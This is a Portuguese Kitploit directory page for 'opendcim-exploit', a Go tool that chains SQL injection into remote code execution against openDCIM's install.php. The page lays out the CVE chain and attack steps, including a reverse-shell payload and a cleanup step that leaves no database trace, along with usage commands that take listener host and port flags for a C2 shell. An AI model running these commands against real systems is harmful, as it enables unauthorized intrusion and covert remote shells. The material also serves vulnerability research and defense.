Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
opendcim-exploit — Cadeia de SQLi para RCE no openDCIM install.php (CWE-862 + CWE-89 + CWE-78) | Kitploit
Ferramentas/GitHubGitHub/chocapikk/opendcim-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubchocapikk/opendcim-exploit

opendcim-exploit

Cadeia de SQLi para RCE no openDCIM install.php (CWE-862 + CWE-89 + CWE-78)

Ver Repositório
522há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

openDCIM - SQLi para RCE via Envenenamento de Configuração

Cadeia de execução remota de código que visa o formulário de configuração LDAP do install.php do openDCIM. Construída sobre o framework VulnCheck go-exploit.

Cadeia de Vulnerabilidades

#CVECWEDescription
1CVE-2026-28515CWE-862install.php não realiza verificação de função antes do formulário de configuração LDAP - qualquer usuário pode acessá-lo
2CVE-2026-28516CWE-89Config::UpdateParameter() usa interpolação de strings, consultas empilhadas via PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php passa o valor de configuração dot diretamente para exec()

Afetadas: Todas as versões (testado no commit mais recente 4467e9c4)

Como Funciona

  1. POST para install.php - a injeção de SQL via formulário LDAP faz backup da configuração e sobrescreve dot com um payload de comando
  2. GET report_network_map.php - aciona exec(), confirma RCE via saída de id
  3. POST para install.php - sobrescreve dot com payload de reverse shell
  4. GET report_network_map.php - aciona reverse shell
  5. POST para install.php - restaura todos os valores originais de configuração da tabela de backup

Nenhum rastro é deixado no banco de dados após a exploração.

Compilação

go build -o opendcim-exploit .

Uso

Implantações Docker (sem autenticação)

# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

Implantações htpasswd (qualquer usuário válido)

./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Flags

FlagDefaultDescription
-rhostHost alvo
-rport80Porta alvo
-sslfalseUsar HTTPS
-lhostHost do listener (para reverse shell)
-lportPorta do listener (para reverse shell)
-c2Tipo de C2: SimpleShellServer ou SSLShellServer
-usernameNome de usuário da autenticação HTTP Basic (omitir para implantações SetEnv)
-passwordSenha da autenticação HTTP Basic (omitir para implantações SetEnv)
-aDetecção de ativos (verifica se o alvo é explorável)
-eModo exploit
Baixar ferramenta